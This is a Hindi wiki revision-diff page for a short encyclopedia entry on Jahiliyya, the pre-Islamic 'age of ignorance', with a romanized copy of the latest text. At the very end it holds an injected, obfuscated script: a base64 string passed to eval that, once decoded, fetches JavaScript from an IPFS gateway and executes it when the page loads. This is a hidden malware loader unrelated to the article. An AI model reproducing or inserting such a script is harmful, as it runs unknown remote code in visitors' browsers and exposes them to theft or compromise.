Difference between revisions of "जाहिलीया"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
{{पुनरीक्षण}}
+
'''जाहिलीया''' [[इस्लाम]] में [[मुहम्मद|पैग़म्बर मुहम्मद]] के सामने हुए [[क़ुरआन]] के रहस्योंद्घाटन के पहले का काल|
'''जाहिलीया''' [[इस्लाम]] में [[पैग़म्बर मुहम्मद]] के सामने हुए [[क़ुरान]] के रहस्योंद्घाटन के पहले का काल, [[अरबी भाषा|अरबी]] में इस शब्द का अर्थ है, 'अज्ञानता' या 'बर्बरता', जो [[मुस्लिम]] मूल्याकंन में अरब की संस्कृति और इस्लाम-पूर्व जीवन को इस्लाम की शिक्षा तथा नियमों की तुलना में नकारात्मक सिद्ध करता है। इस शब्द की सकारात्मक व्याख्या केवल [[साहित्य]] में है, पूर्व-इस्लामी अरबी कविताएं अपने सारगर्भित और समृद्ध शब्द ज्ञान, परिष्कृत छंद रचना और पूर्ण रूप से विकसित क़ाफ़ियो तथा विषय-वस्तु क्रम के कारण सम्माननीय है।
+
 
 +
*[[अरबी भाषा|अरबी]] में इस शब्द का अर्थ है- 'अज्ञानता' या 'बर्बरता', जो [[मुस्लिम]] मूल्याकंन में अरब की संस्कृति और इस्लाम-पूर्व जीवन को इस्लाम की शिक्षा तथा नियमों की तुलना में नकारात्मक सिद्ध करता है।
 +
*जाहिलीया शब्द की सकारात्मक व्याख्या केवल [[साहित्य]] में है, पूर्व-इस्लामी अरबी [[कविता|कविताएं]] अपने सारगर्भित और समृद्ध शब्द ज्ञान, परिष्कृत [[छन्द]] रचना और पूर्ण रूप से विकसित क़ाफ़ियो तथा विषय-वस्तु क्रम के कारण सम्माननीय है।
  
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==बाहरी कड़ियाँ==
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{इस्लाम धर्म}}
 
{{इस्लाम धर्म}}
[[Category:इस्लाम धर्म]]
+
[[Category:इस्लाम धर्म]][[Category:इस्लाम धर्म कोश]][[Category:धर्म कोश]]
[[Category:इस्लाम धर्म कोश]][[Category:धर्म कोश]]
 
[[Category:नया पन्ना फ़रवरी-2012]]
 
 
 
 
__INDEX__
 
__INDEX__

Latest revision as of 10:09, 4 August 2014

jahiliya islam mean paigambar muhammad ke samane hue quran ke rahasyoandghatan ke pahale ka kal|

  • arabi mean is shabd ka arth hai- 'ajnanata' ya 'barbarata', jo muslim moolyakann mean arab ki sanskriti aur islam-poorv jivan ko islam ki shiksha tatha niyamoan ki tulana mean nakaratmak siddh karata hai.
  • jahiliya shabd ki sakaratmak vyakhya keval sahity mean hai, poorv-islami arabi kavitaean apane saragarbhit aur samriddh shabd jnan, parishkrit chhand rachana aur poorn roop se vikasit qafiyo tatha vishay-vastu kram ke karan sammananiy hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>